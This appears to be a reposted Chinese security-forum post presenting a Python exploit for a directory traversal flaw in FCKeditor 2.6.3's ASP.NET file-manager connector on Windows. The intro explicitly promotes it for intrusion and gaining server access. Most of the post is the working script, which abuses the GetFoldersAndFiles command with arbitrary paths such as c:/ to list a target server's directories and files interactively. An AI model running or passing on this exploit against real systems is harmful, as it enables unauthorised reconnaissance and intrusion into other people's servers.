最新FCKeditor编辑器asp.net目录遍历漏洞
只针对Win平台 asp.net 的FCKeditor编辑器有效
目前只测试过FCKeditor编辑器2.6.3版本
我们经常在入侵渗透的过程中会遇到FCKeditor编辑器,在最新的版本中,很少有漏洞,所以更新了这个漏洞,希望能对大家在入侵渗透的过程中,利用这个漏洞来获取目标服务器的权限,最新FCKeditor编辑器asp.net存在目录遍历漏洞,请大家酌情进行友情监测
以下是最新FCKeditor编辑器asp.net目录遍历漏洞的漏洞利用代码,很好很强大
[Python] 纯文本查看 复制代码 #coding:utf-8
#code by 一丝不挂@90sec.org [url]http://www.jjsec.com[/url]
import getopt, sys, urllib, urllib2,string
from xml.etree import ElementTree
def read_Folder(text):
root = ElementTree.fromstring(text)
lst_node = root.getiterator(“Folder”)
for node in lst_node:
if node.attrib.has_key(“name”) > 0 :
print “<DIR> %s” % node.attrib['name']
def read_file(text):
root = ElementTree.fromstring(text)
lst_node = root.getiterator(“File”)
for node in lst_node:
if node.attrib.has_key(“name”) > 0 :
print “%s %s” % (node.attrib['size'],node.attrib['name'])
if len(sys.argv) < 2:
print “——————————————————–\r\n\r\n FCKeditor asp.net目录遍历Exploit\r\n Code by 一丝不挂@90sec.org\r\n\r\n使用方法:\r\n”+sys.argv[0]+” http:/www.jjsec.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx\r\n
输入 c:/ 按回车可遍历c盘目录\r\n
输入 exit 按回车退出程序\r\n\r\n——————————————————–”
sys.exit()
else:
url=sys.argv[1]
print “\r\n当前Url地址:”+url+”\r\n”
path = ”
while True:
path = raw_input(“[Ysbg@90sec "+path+"]# “)
if path == ‘exit’:
print ‘退出’
break
else:
req = urllib2.Request(url+”?Command=GetFoldersAndFiles&Type=File&CurrentFolder=”+urllib.quote(path.decode(sys.stdin.encoding).encode(‘utf8′)))
res = urllib2.urlopen(req)
html = res.read()
print “\r\n”+” “+path+” 的目录”
read_Folder(html)
print “\r\n”
#print “kb 文件名”
read_file(html)
print “\r\n”
res.close()
文章转自90sec.org
|